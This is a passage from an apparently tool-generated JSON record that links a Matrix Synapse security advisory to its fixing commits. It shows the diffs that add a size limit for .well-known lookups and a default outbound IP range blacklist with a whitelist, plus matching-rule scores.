"https://github.com/matrix-org/synapse/issues/8829": 1, + "https://github.com/matrix-org/synapse/issues/8856": 1, + "https://github.com/matrix-org/synapse/issues/8958": 1, + "https://github.com/matrix-org/synapse/issues/8861": 1, + "https://github.com/matrix-org/synapse/issues/8864": 1, + "https://github.com/matrix-org/synapse/issues/8879": 1, + "https://github.com/matrix-org/synapse/issues/8880": 1, + "https://github.com/matrix-org/synapse/issues/8882": 1, + "https://github.com/matrix-org/synapse/issues/8901": 1, + "https://github.com/matrix-org/synapse/issues/8940": 1, + "https://github.com/matrix-org/synapse/issues/8943": 1, + "https://github.com/matrix-org/synapse/issues/9020": 1, + "https://github.com/matrix-org/synapse/issues/8881": 1, + "https://github.com/matrix-org/synapse/issues/8905": 1, + "https://github.com/matrix-org/synapse/issues/8906": 1, + "https://github.com/matrix-org/synapse/issues/8909": 1, + "https://github.com/matrix-org/synapse/issues/8916": 1, + "https://github.com/matrix-org/synapse/issues/8935": 1, + "https://github.com/matrix-org/synapse/issues/8929": 1, + "https://github.com/matrix-org/synapse/issues/8946": 1, + "https://github.com/matrix-org/synapse/issues/8950": 1, + "https://github.com/matrix-org/synapse/issues/8952": 1, + "https://github.com/matrix-org/synapse/issues/8963": 1, + "https://github.com/matrix-org/synapse/issues/8973": 1, + "https://github.com/matrix-org/synapse/issues/8976": 1, + "https://github.com/matrix-org/synapse/issues/8979": 1, + "https://github.com/matrix-org/synapse/issues/8980": 1, + "https://github.com/matrix-org/synapse/issues/8986": 1, + "https://github.com/matrix-org/synapse/issues/8998": 1, + "https://github.com/matrix-org/synapse/issues/8999": 1, + "https://github.co/hiddenchars": 1, + "https://github.com/matrix-org/synapse/pull/8950#event-4122091867": 1, + "https://github.com/matrix-org/synapse/pull/9084": 1, + "https://pagure.io/fedora-infrastructure/issue/12043": 1, + "https://github.com/matrix-org/synapse": 1, + "https://github.com/matrix-": 1, + "https://fedoraproject.org/wiki/Fedora_35_Mass_Rebuild": 1, + "https://pagure.io/fesco/issue/2583": 1, + "https://bugzilla.redhat.com/show_bug.cgi?id=1910740": 1, + "https://bugzilla.redhat.com/show_bug.cgi?id=1918426": 1, + "https://bugzilla.redhat.com/show_bug.cgi?id=1934603": 1, + "https://bugzilla.redhat.com/show_bug.cgi?id=1934606": 1, + "https://bugzilla.redhat.com/show_bug.cgi?id=1944136": 1, + "https://bugzilla.redhat.com/show_bug.cgi?id=1944139": 1, + "https://bugzilla.redhat.com/show_bug.cgi?id=1949110": 1, + "https://bugzilla.redhat.com/show_bug.cgi?id=1949112": 1, + "https://bugzilla.redhat.com/show_bug.cgi?id=1958801": 1, + "https://bugzilla.redhat.com/show_bug.cgi?id=1959542": 1, + "http://dnf.readthedocs.io/en/latest/command_ref.html#upgrade-command-label": 1, + "https://fedoraproject.org/keys": 1, + "http://hyperkitty.readthedocs.org": 1 + }, + "affected_products": [ + "Messaging", + "python", + "synapse", + "VoIP", + "Instant", + "Matrix" + ], + "versions": { + "status": "affected", + "version": ">=0.99.0, < 1.25.0" + }, + "files": [ + "well-known", + "VoIP", + "federation_domain_whitelist", + "matrix-synapse" + ], + "keywords": [ + "redirect", + "federate", + "service", + "request", + "synapse", + "messaging", + "federation", + "setting", + "denial", + "know", + "resource", + "issue", + "python", + "matrix", + "file", + "lead", + "write", + "attack", + "version", + "ecosystem", + "pypi", + "voip", + "restrict", + "homeserver", + "consume", + "workaround", + "instant", + "reference", + "accept", + "package", + "affect", + "resolve", + "server", + "communicate" + ], + "files_extension": [], + "has_fixing_commit": true + }, + "commits": [ + { + "commit_id": "ff5c4da1289cb5e097902b3e55b771be342c29d6", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1608157524, + "hunks": 23, + "message": "Add a maximum size for well-known lookups. (#8950)", + "diff": [ + "diff --git a/changelog.d/8950.misc b/changelog.d/8950.misc", + "new file mode 100644", + "index 000000000..42e0335af", + "--- /dev/null", + "+++ b/changelog.d/8950.misc", + "@@ -0,0 +1 @@", + "+Add a maximum size of 50 kilobytes to .well-known lookups.", + "diff --git a/synapse/http/client.py b/synapse/http/client.py", + "index df7730078..29f40ddf5 100644", + "--- a/synapse/http/client.py", + "+++ b/synapse/http/client.py", + "@@ -722,7 +722,10 @@ class SimpleHttpClient:", + " length = await make_deferred_yieldable(", + "- readBodyToFile(response, output_stream, max_size)", + "+ read_body_with_max_size(response, output_stream, max_size)", + "+ )", + "+ except BodyExceededMaxSize:", + "+ SynapseError(", + "+ 502,", + "+ \"Requested file is too large > %r bytes\" % (max_size,),", + "+ Codes.TOO_LARGE,", + " )", + "- except SynapseError:", + "- # This can happen e.g. because the body is too large.", + "- raise", + " except Exception as e:", + "@@ -750,3 +753,7 @@ def _timeout_to_request_timed_out_error(f: Failure):", + "-class _ReadBodyToFileProtocol(protocol.Protocol):", + "+class BodyExceededMaxSize(Exception):", + "+ \"\"\"The maximum allowed size of the HTTP body was exceeded.\"\"\"", + "+", + "+", + "+class _ReadBodyWithMaxSizeProtocol(protocol.Protocol):", + " def __init__(", + "@@ -763,9 +770,3 @@ class _ReadBodyToFileProtocol(protocol.Protocol):", + " if self.max_size is not None and self.length >= self.max_size:", + "- self.deferred.errback(", + "- SynapseError(", + "- 502,", + "- \"Requested file is too large > %r bytes\" % (self.max_size,),", + "- Codes.TOO_LARGE,", + "- )", + "- )", + "+ self.deferred.errback(BodyExceededMaxSize())", + " self.deferred = defer.Deferred()", + "@@ -784,3 +785,3 @@ class _ReadBodyToFileProtocol(protocol.Protocol):", + "-def readBodyToFile(", + "+def read_body_with_max_size(", + " response: IResponse, stream: BinaryIO, max_size: Optional[int]", + "@@ -790,2 +791,5 @@ def readBodyToFile(", + "+ If the maximum file size is reached, the returned Deferred will resolve to a", + "+ Failure with a BodyExceededMaxSize exception.", + "+", + " Args:", + "@@ -800,3 +804,3 @@ def readBodyToFile(", + " d = defer.Deferred()", + "- response.deliverBody(_ReadBodyToFileProtocol(stream, d, max_size))", + "+ response.deliverBody(_ReadBodyWithMaxSizeProtocol(stream, d, max_size))", + " return d", + "diff --git a/synapse/http/federation/well_known_resolver.py b/synapse/http/federation/well_known_resolver.py", + "index 5e08ef166..b3b6dbcab 100644", + "--- a/synapse/http/federation/well_known_resolver.py", + "+++ b/synapse/http/federation/well_known_resolver.py", + "@@ -17,2 +17,3 @@ import random", + " import time", + "+from io import BytesIO", + " from typing import Callable, Dict, Optional, Tuple", + "@@ -23,3 +24,3 @@ from twisted.internet import defer", + " from twisted.internet.interfaces import IReactorTime", + "-from twisted.web.client import RedirectAgent, readBody", + "+from twisted.web.client import RedirectAgent", + " from twisted.web.http import stringToDatetime", + "@@ -28,2 +29,3 @@ from twisted.web.iweb import IAgent, IResponse", + "+from synapse.http.client import BodyExceededMaxSize, read_body_with_max_size", + " from synapse.logging.context import make_deferred_yieldable", + "@@ -55,2 +57,5 @@ WELL_KNOWN_MIN_CACHE_PERIOD = 5 * 60", + "+# The maximum size (in bytes) to allow a well-known file to be.", + "+WELL_KNOWN_MAX_SIZE = 50 * 1024 # 50 KiB", + "+", + " # Attempt to refetch a cached well-known N% of the TTL before it expires.", + "@@ -231,2 +236,5 @@ class WellKnownResolver:", + "+ Raises:", + "+ _FetchWellKnownFailure if we fail to lookup a result", + "+", + " Returns:", + "@@ -252,3 +260,7 @@ class WellKnownResolver:", + " )", + "- body = await make_deferred_yieldable(readBody(response))", + "+ body_stream = BytesIO()", + "+ await make_deferred_yieldable(", + "+ read_body_with_max_size(response, body_stream, WELL_KNOWN_MAX_SIZE)", + "+ )", + "+ body = body_stream.getvalue()", + "@@ -261,2 +273,11 @@ class WellKnownResolver:", + " raise", + "+ except BodyExceededMaxSize:", + "+ # If the well-known file was too large, do not keep attempting", + "+ # to download it, but consider it a temporary error.", + "+ logger.warning(", + "+ \"Requested .well-known file for %s is too large > %r bytes\",", + "+ server_name.decode(\"ascii\"),", + "+ WELL_KNOWN_MAX_SIZE,", + "+ )", + "+ raise _FetchWellKnownFailure(temporary=True)", + " except Exception as e:", + "diff --git a/synapse/http/matrixfederationclient.py b/synapse/http/matrixfederationclient.py", + "index c96299472..b261e078c 100644", + "--- a/synapse/http/matrixfederationclient.py", + "+++ b/synapse/http/matrixfederationclient.py", + "@@ -39,2 +39,3 @@ import synapse.util.retryutils", + " from synapse.api.errors import (", + "+ Codes,", + " FederationDeniedError,", + "@@ -42,2 +43,3 @@ from synapse.api.errors import (", + " RequestSendFailed,", + "+ SynapseError,", + " )", + "@@ -47,4 +49,5 @@ from synapse.http.client import (", + " BlacklistingReactorWrapper,", + "+ BodyExceededMaxSize,", + " encode_query_args,", + "- readBodyToFile,", + "+ read_body_with_max_size,", + " )", + "@@ -977,5 +980,11 @@ class MatrixFederationHttpClient:", + " try:", + "- d = readBodyToFile(response, output_stream, max_size)", + "+ d = read_body_with_max_size(response, output_stream, max_size)", + " d.addTimeout(self.default_timeout, self.reactor)", + " length = await make_deferred_yieldable(d)", + "+ except BodyExceededMaxSize:", + "+ msg = \"Requested file is too large > %r bytes\" % (max_size,)", + "+ logger.warning(", + "+ \"{%s} [%s] %s\", request.txn_id, request.destination, msg,", + "+ )", + "+ SynapseError(502, msg, Codes.TOO_LARGE)", + " except Exception as e:", + "diff --git a/tests/http/federation/test_matrix_federation_agent.py b/tests/http/federation/test_matrix_federation_agent.py", + "index 626acdcaa..4e51839d0 100644", + "--- a/tests/http/federation/test_matrix_federation_agent.py", + "+++ b/tests/http/federation/test_matrix_federation_agent.py", + "@@ -38,2 +38,3 @@ from synapse.http.federation.srv_resolver import Server", + " from synapse.http.federation.well_known_resolver import (", + "+ WELL_KNOWN_MAX_SIZE,", + " WellKnownResolver,", + "@@ -1109,2 +1110,28 @@ class MatrixFederationAgentTests(unittest.TestCase):", + "+ def test_well_known_too_large(self):", + "+ \"\"\"A well-known query that returns a result which is too large should be rejected.\"\"\"", + "+ self.reactor.lookups[\"testserv\"] = \"1.2.3.4\"", + "+", + "+ fetch_d = defer.ensureDeferred(", + "+ self.well_known_resolver.get_well_known(b\"testserv\")", + "+ )", + "+", + "+ # there should be an attempt to connect on port 443 for the .well-known", + "+ clients = self.reactor.tcpClients", + "+ self.assertEqual(len(clients), 1)", + "+ (host, port, client_factory, _timeout, _bindAddress) = clients.pop(0)", + "+ self.assertEqual(host, \"1.2.3.4\")", + "+ self.assertEqual(port, 443)", + "+", + "+ self._handle_well_known_connection(", + "+ client_factory,", + "+ expected_sni=b\"testserv\",", + "+ response_headers={b\"Cache-Control\": b\"max-age=1000\"},", + "+ content=b'{ \"m.server\": \"' + (b\"a\" * WELL_KNOWN_MAX_SIZE) + b'\" }',", + "+ )", + "+", + "+ # The result is sucessful, but disabled delegation.", + "+ r = self.successResultOf(fetch_d)", + "+ self.assertIsNone(r.delegated_server)", + "+", + " def test_srv_fallbacks(self):" + ], + "changed_files": [ + "changelog.d/8950.misc", + "synapse/http/client.py", + "synapse/http/federation/well_known_resolver.py", + "synapse/http/matrixfederationclient.py", + "tests/http/federation/test_matrix_federation_agent.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": { + "8950": "UnboundLocalError raised when response body exceeds max size #9132 MSC2499: Fixes for Well-known URIs matrix-org/matrix-spec-proposals#2499" + }, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "COMMIT_IS_SECURITY_RELEVANT", + "message": "", + "relevance": 32 + }, + { + "id": "XREF_GH", + "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8950, 8950", + "relevance": 32 + }, + { + "id": "COMMIT_IN_REFERENCE", + "message": "This commit is mentioned 7 times in the references.", + "relevance": 64 + }, + { + "id": "RELEVANT_WORDS_IN_MESSAGE", + "message": "The commit message contains some relevant words: well-known", + "relevance": 8 + }, + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: well-known", + "relevance": 8 + }, + { + "id": "ADV_KEYWORDS_IN_MSG", + "message": "The commit message and the advisory description contain the following keywords: know", + "relevance": 4 + }, + { + "id": "ADV_KEYWORDS_IN_FILES", + "message": "An advisory keyword is contained in the changed files: resolve, federation, know", + "relevance": 4 + }, + { + "id": "GITHUB_ISSUE_IN_MESSAGE", + "message": "The commit message references some github issue: 8950", + "relevance": 2 + } + ] + }, + { + "commit_id": "344ab0b53abc0291d79882f8bdc1a853f7495ed4", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1607540166, + "hunks": 27, + "message": "Default to blacklisting reserved IP ranges and add a whitelist. (#8870) This defaults `ip_range_blacklist` to reserved IP ranges and also adds an `ip_range_whitelist` setting to override it.", + "diff": [ + "diff --git a/changelog.d/8821.bugfix b/changelog.d/8821.bugfix", + "index 8ddfbf31c..39f53174a 100644", + "--- a/changelog.d/8821.bugfix", + "+++ b/changelog.d/8821.bugfix", + "@@ -1 +1 @@", + "-Apply the `federation_ip_range_blacklist` to push and key revocation requests.", + "+Apply an IP range blacklist to push and key revocation requests.", + "diff --git a/changelog.d/8870.bugfix b/changelog.d/8870.bugfix", + "new file mode 100644", + "index 000000000..39f53174a", + "--- /dev/null", + "+++ b/changelog.d/8870.bugfix", + "@@ -0,0 +1 @@", + "+Apply an IP range blacklist to push and key revocation requests.", + "diff --git a/docs/sample_config.yaml b/docs/sample_config.yaml", + "index 68c8f4f0e..f196781c1 100644", + "--- a/docs/sample_config.yaml", + "+++ b/docs/sample_config.yaml", + "@@ -146,2 +146,31 @@ pid_file: DATADIR/homeserver.pid", + "+# Prevent outgoing requests from being sent to the following blacklisted IP address", + "+# CIDR ranges. If this option is not specified then it defaults to private IP", + "+# address ranges (see the example below).", + "+#", + "+# The blacklist applies to the outbound requests for federation, identity servers,", + "+# push servers, and for checking key validity for third-party invite events.", + "+#", + "+# (0.0.0.0 and :: are always blacklisted, whether or not they are explicitly", + "+# listed here, since they correspond to unroutable addresses.)", + "+#", + "+# This option replaces federation_ip_range_blacklist in Synapse v1.25.0.", + "+#", + "+#ip_range_blacklist:", + "+# - '127.0.0.0/8'", + "+# - '10.0.0.0/8'", + "+# - '172.16.0.0/12'", + "+# - '192.168.0.0/16'", + "+# - '100.64.0.0/10'", + "+# - '192.0.0.0/24'", + "+# - '169.254.0.0/16'", + "+# - '198.18.0.0/15'", + "+# - '192.0.2.0/24'", + "+# - '198.51.100.0/24'", + "+# - '203.0.113.0/24'", + "+# - '224.0.0.0/4'", + "+# - '::1/128'", + "+# - 'fe80::/10'", + "+# - 'fc00::/7'", + "+", + " # List of ports that Synapse should listen on, their purpose and their", + "@@ -644,24 +673,13 @@ acme:", + "-# Prevent outgoing requests from being sent to the following blacklisted IP address", + "-# CIDR ranges. If this option is not specified, or specified with an empty list,", + "-# no IP range blacklist will be enforced.", + "+# List of IP address CIDR ranges that should be allowed for federation,", + "+# identity servers, push servers, and for checking key validity for", + "+# third-party invite events. This is useful for specifying exceptions to", + "+# wide-ranging blacklisted target IP ranges - e.g. for communication with", + "+# a push server only visible in your network.", + " #", + "-# The blacklist applies to the outbound requests for federation, identity servers,", + "-# push servers, and for checking key validitity for third-party invite events.", + "-#", + "-# (0.0.0.0 and :: are always blacklisted, whether or not they are explicitly", + "-# listed here, since they correspond to unroutable addresses.)", + "-#", + "-# This option replaces federation_ip_range_blacklist in Synapse v1.24.0.", + "+# This whitelist overrides ip_range_blacklist and defaults to an empty", + "+# list.", + " #", + "-ip_range_blacklist:", + "- - '127.0.0.0/8'", + "- - '10.0.0.0/8'", + "- - '172.16.0.0/12'", + "- - '192.168.0.0/16'", + "- - '100.64.0.0/10'", + "- - '169.254.0.0/16'", + "- - '::1/128'", + "- - 'fe80::/64'", + "- - 'fc00::/7'", + "+#ip_range_whitelist:", + "+# - '192.168.1.1'", + "@@ -957,5 +975,11 @@ media_store_path: \"DATADIR/media_store\"", + " # - '100.64.0.0/10'", + "+# - '192.0.0.0/24'", + " # - '169.254.0.0/16'", + "+# - '198.18.0.0/15'", + "+# - '192.0.2.0/24'", + "+# - '198.51.100.0/24'", + "+# - '203.0.113.0/24'", + "+# - '224.0.0.0/4'", + " # - '::1/128'", + "-# - 'fe80::/64'", + "+# - 'fe80::/10'", + " # - 'fc00::/7'", + "diff --git a/synapse/config/federation.py b/synapse/config/federation.py", + "index 27ccf61c3..a03a419e2 100644", + "--- a/synapse/config/federation.py", + "+++ b/synapse/config/federation.py", + "@@ -14,8 +14,5 @@", + " # limitations under the License.", + "-", + " from typing import Optional", + "-from netaddr import IPSet", + "-", + "-from synapse.config._base import Config, ConfigError", + "+from synapse.config._base import Config", + " from synapse.config._util import validate_config", + "@@ -38,27 +35,2 @@ class FederationConfig(Config):", + "- ip_range_blacklist = config.get(\"ip_range_blacklist\", [])", + "-", + "- # Attempt to create an IPSet from the given ranges", + "- try:", + "- self.ip_range_blacklist = IPSet(ip_range_blacklist)", + "- except Exception as e:", + "- raise ConfigError(\"Invalid range(s) provided in ip_range_blacklist: %s\" % e)", + "- # Always blacklist 0.0.0.0, ::", + "- self.ip_range_blacklist.update([\"0.0.0.0\", \"::\"])", + "-", + "- # The federation_ip_range_blacklist is used for backwards-compatibility", + "- # and only applies to federation and identity servers. If it is not given,", + "- # default to ip_range_blacklist.", + "- federation_ip_range_blacklist = config.get(", + "- \"federation_ip_range_blacklist\", ip_range_blacklist", + "- )", + "- try:", + "- self.federation_ip_range_blacklist = IPSet(federation_ip_range_blacklist)", + "- except Exception as e:", + "- raise ConfigError(", + "- \"Invalid range(s) provided in federation_ip_range_blacklist: %s\" % e", + "- )", + "- # Always blacklist 0.0.0.0, ::", + "- self.federation_ip_range_blacklist.update([\"0.0.0.0\", \"::\"])", + "-", + " federation_metrics_domains = config.get(\"federation_metrics_domains\") or []", + "@@ -86,24 +58,13 @@ class FederationConfig(Config):", + "- # Prevent outgoing requests from being sent to the following blacklisted IP address", + "- # CIDR ranges. If this option is not specified, or specified with an empty list,", + "- # no IP range blacklist will be enforced.", + "- #", + "- # The blacklist applies to the outbound requests for federation, identity servers,", + "- # push servers, and for checking key validitity for third-party invite events.", + "- #", + "- # (0.0.0.0 and :: are always blacklisted, whether or not they are explicitly", + "- # listed here, since they correspond to unroutable addresses.)", + "+ # List of IP address CIDR ranges that should be allowed for federation,", + "+ # identity servers, push servers, and for checking key validity for", + "+ # third-party invite events. This is useful for specifying exceptions to", + "+ # wide-ranging blacklisted target IP ranges - e.g. for communication with", + "+ # a push server only visible in your network.", + " #", + "- # This option replaces federation_ip_range_blacklist in Synapse v1.24.0.", + "+ # This whitelist overrides ip_range_blacklist and defaults to an empty", + "+ # list.", + " #", + "- ip_range_blacklist:", + "- - '127.0.0.0/8'", + "- - '10.0.0.0/8'", + "- - '172.16.0.0/12'", + "- - '192.168.0.0/16'", + "- - '100.64.0.0/10'", + "- - '169.254.0.0/16'", + "- - '::1/128'", + "- - 'fe80::/64'", + "- - 'fc00::/7'", + "+ #ip_range_whitelist:", + "+ # - '192.168.1.1'", + "diff --git a/synapse/config/repository.py b/synapse/config/repository.py", + "index 17ce9145e..850ac3ebd 100644", + "--- a/synapse/config/repository.py", + "+++ b/synapse/config/repository.py", + "@@ -19,2 +19,5 @@ from typing import Dict, List", + "+from netaddr import IPSet", + "+", + "+from synapse.config.server import DEFAULT_IP_RANGE_BLACKLIST", + " from synapse.python_dependencies import DependencyException, check_requirements", + "@@ -186,5 +189,2 @@ class ContentRepositoryConfig(Config):", + "- # netaddr is a dependency for url_preview", + "- from netaddr import IPSet", + "-", + " self.url_preview_ip_range_blacklist = IPSet(", + "@@ -217,2 +217,6 @@ class ContentRepositoryConfig(Config):", + "+ ip_range_blacklist = \"\\n\".join(", + "+ \" # - '%s'\" % ip for ip in DEFAULT_IP_RANGE_BLACKLIST", + "+ )", + "+", + " return (", + "@@ -287,11 +291,3 @@ class ContentRepositoryConfig(Config):", + " #url_preview_ip_range_blacklist:", + "- # - '127.0.0.0/8'", + "- # - '10.0.0.0/8'", + "- # - '172.16.0.0/12'", + "- # - '192.168.0.0/16'", + "- # - '100.64.0.0/10'", + "- # - '169.254.0.0/16'", + "- # - '::1/128'", + "- # - 'fe80::/64'", + "- # - 'fc00::/7'", + "+%(ip_range_blacklist)s", + "diff --git a/synapse/config/server.py b/synapse/config/server.py", + "index 85aa49c02..f3815e5ad 100644", + "--- a/synapse/config/server.py", + "+++ b/synapse/config/server.py", + "@@ -25,2 +25,3 @@ import attr", + " import yaml", + "+from netaddr import IPSet", + "@@ -41,2 +42,30 @@ DEFAULT_BIND_ADDRESSES = [\"::\", \"0.0.0.0\"]", + "+DEFAULT_IP_RANGE_BLACKLIST = [", + "+ # Localhost", + "+ \"127.0.0.0/8\",", + "+ # Private networks.", + "+ \"10.0.0.0/8\",", + "+ \"172.16.0.0/12\",", + "+ \"192.168.0.0/16\",", + "+ # Carrier grade NAT.", + "+ \"100.64.0.0/10\",", + "+ # Address registry.", + "+ \"192.0.0.0/24\",", + "+ # Link-local networks.", + "+ \"169.254.0.0/16\",", + "+ # Testing networks.", + "+ \"198.18.0.0/15\",", + "+ \"192.0.2.0/24\",", + "+ \"198.51.100.0/24\",", + "+ \"203.0.113.0/24\",", + "+ # Multicast.", + "+ \"224.0.0.0/4\",", + "+ # Localhost", + "+ \"::1/128\",", + "+ # Link-local addresses.", + "+ \"fe80::/10\",", + "+ # Unique local addresses.", + "+ \"fc00::/7\",", + "+]", + "+", + " DEFAULT_ROOM_VERSION = \"6\"", + "@@ -258,2 +287,34 @@ class ServerConfig(Config):", + "+ ip_range_blacklist = config.get(", + "+ \"ip_range_blacklist\", DEFAULT_IP_RANGE_BLACKLIST", + "+ )", + "+", + "+ # Attempt to create an IPSet from the given ranges", + "+ try:", + "+ self.ip_range_blacklist = IPSet(ip_range_blacklist)", + "+ except Exception as e:", + "+ raise ConfigError(\"Invalid range(s) provided in ip_range_blacklist.\") from e", + "+ # Always blacklist 0.0.0.0, ::", + "+ self.ip_range_blacklist.update([\"0.0.0.0\", \"::\"])", + "+", + "+ try:", + "+ self.ip_range_whitelist = IPSet(config.get(\"ip_range_whitelist\", ()))", + "+ except Exception as e:", + "+ raise ConfigError(\"Invalid range(s) provided in ip_range_whitelist.\") from e", + "+", + "+ # The federation_ip_range_blacklist is used for backwards-compatibility", + "+ # and only applies to federation and identity servers. If it is not given,", + "+ # default to ip_range_blacklist.", + "+ federation_ip_range_blacklist = config.get(", + "+ \"federation_ip_range_blacklist\", ip_range_blacklist", + "+ )", + "+ try:", + "+ self.federation_ip_range_blacklist = IPSet(federation_ip_range_blacklist)", + "+ except Exception as e:", + "+ raise ConfigError(", + "+ \"Invalid range(s) provided in federation_ip_range_blacklist.\"", + "+ ) from e", + "+ # Always blacklist 0.0.0.0, ::", + "+ self.federation_ip_range_blacklist.update([\"0.0.0.0\", \"::\"])", + "+", + " if self.public_baseurl is not None:", + "@@ -563,2 +624,6 @@ class ServerConfig(Config):", + " ):", + "+ ip_range_blacklist = \"\\n\".join(", + "+ \" # - '%s'\" % ip for ip in DEFAULT_IP_RANGE_BLACKLIST", + "+ )", + "+", + " _, bind_port = parse_and_validate_server_name(server_name)", + "@@ -754,2 +819,17 @@ class ServerConfig(Config):", + "+ # Prevent outgoing requests from being sent to the following blacklisted IP address", + "+ # CIDR ranges. If this option is not specified then it defaults to private IP", + "+ # address ranges (see the example below).", + "+ #", + "+ # The blacklist applies to the outbound requests for federation, identity servers,", + "+ # push servers, and for checking key validity for third-party invite events.", + "+ #", + "+ # (0.0.0.0 and :: are always blacklisted, whether or not they are explicitly", + "+ # listed here, since they correspond to unroutable addresses.)", + "+ #", + "+ # This option replaces federation_ip_range_blacklist in Synapse v1.25.0.", + "+ #", + "+ #ip_range_blacklist:", + "+%(ip_range_blacklist)s", + "+", + " # List of ports that Synapse should listen on, their purpose and their", + "diff --git a/synapse/server.py b/synapse/server.py", + "index 9af759626..043810ad3 100644", + "--- a/synapse/server.py", + "+++ b/synapse/server.py", + "@@ -372,3 +372,3 @@ class HomeServer(metaclass=abc.ABCMeta):", + " An HTTP client that uses configured HTTP(S) proxies and blacklists IPs", + "- based on the IP range blacklist.", + "+ based on the IP range blacklist/whitelist.", + " \"\"\"", + "@@ -376,2 +376,3 @@ class HomeServer(metaclass=abc.ABCMeta):", + " self,", + "+ ip_whitelist=self.config.ip_range_whitelist,", + " ip_blacklist=self.config.ip_range_blacklist,", + "diff --git a/tests/replication/test_multi_media_repo.py b/tests/replication/test_multi_media_repo.py", + "index 48b574ccb..83afd9fd2 100644", + "--- a/tests/replication/test_multi_media_repo.py", + "+++ b/tests/replication/test_multi_media_repo.py", + "@@ -50,3 +50,3 @@ class MediaRepoShardTestCase(BaseMultiWorkerStreamTestCase):", + "- self.reactor.lookups[\"example.com\"] = \"127.0.0.2\"", + "+ self.reactor.lookups[\"example.com\"] = \"1.2.3.4\"" + ], + "changed_files": [ + "changelog.d/8821.bugfix", + "changelog.d/8870.bugfix", + "docs/sample_config.yaml", + 